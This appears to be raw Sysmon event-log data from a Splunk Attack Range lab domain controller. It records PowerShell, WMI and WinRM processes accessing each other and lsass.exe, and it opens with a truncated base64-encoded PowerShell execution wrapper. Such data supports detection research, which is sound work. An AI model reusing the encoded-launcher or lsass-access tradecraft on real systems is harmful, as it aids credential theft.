EEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000005802Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.219{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005801Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.219{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005800Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.172{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_uo1vynj4.cei.ps12020-12-08 13:54:46.172 10341000x80000000000000005799Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.172{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005798Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005797Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005796Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005795Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005794Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005793Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005792Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005791Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005790Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005789Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005788Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005787Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005786Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005785Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005784Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005783Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005782Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005781Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program 